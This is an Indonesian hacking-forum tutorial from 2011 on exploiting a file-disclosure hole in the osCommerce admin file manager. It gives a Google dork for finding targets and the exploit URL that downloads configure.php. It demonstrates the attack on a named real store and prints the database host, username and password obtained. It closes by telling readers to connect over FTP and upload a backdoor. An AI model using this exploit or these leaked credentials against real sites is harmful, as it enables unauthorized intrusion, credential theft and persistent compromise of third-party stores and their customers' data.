============================================================
#File Disclosure : admin/file_manager.php/login.php?action=download&filename=
#Dork : Powered by osCommerce
#Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
==============================================================</div>
Ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce”
Sekarang kita cari target nya dengan memasukkan dork tadi ke google
Contoh target yang saya dapatkan :
<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>http://rsmjstore.com/admin/login.php</code></div>
</div>
</span>
utk percobaan kita pake trget itu...
Dan kita masuk admin page nya ya...
sekarang, kita pake exploitnya jadinya :
<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>http://rsmjstore.com/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php</code></div>
</div>
</span>
nah kita mendapatkan configure.php, lsg aja deh kita download <img alt="seringai" border="0" src="http://www.palembanghackerlink.org/images/smilies/ym/4.gif" style="vertical-align: middle;" title="seringai" />
Selanjutnya, setelah kita download kita buka menggunakan notepad, disitu akan keluar database dan password :
<span style="color: red;"><div class="codeblock">
<div class="title">
Code:
</div>
<div class="body" dir="ltr">
<code>('DB_SERVER', '10.6.171.62');
define('DB_SERVER_USERNAME', 'rsmjmaster');
define('DB_SERVER_PASSWORD', 'Cb81419');
define('DB_DATABASE', 'rsmjmaster');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?></code></div>
</div>
</span>
Habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
Dan kita Upload backdoor kita
Tue Nov 22, 2011 2:31 pm by nandazzzz
» Tools Untuk Menganalisa Suatu Virus
Tue Nov 22, 2011 2:29 pm by nandazzzz
» admin masu
Tue Nov 22, 2011 2:28 pm by nandazzzz
» Cara Memperkuat Sinyal Modem USB
Tue Nov 22, 2011 2:27 pm by nandazzzz
» Mempercepat koneksi mozilla
Tue Nov 22, 2011 2:26 pm by nandazzzz
» Memblock situs" berbau negatif
Tue Nov 22, 2011 2:25 pm by nandazzzz
» pengumuman buat penghuni forum
Thu Oct 06, 2011 3:49 pm by Nyonya oXside
» Membangun Web Server pada Jaringan Lokal (LAN)
Wed Oct 05, 2011 7:21 pm by farizmht
» Perbedaan Virus Dengan Worm
Wed Oct 05, 2011 7:12 pm by farizmht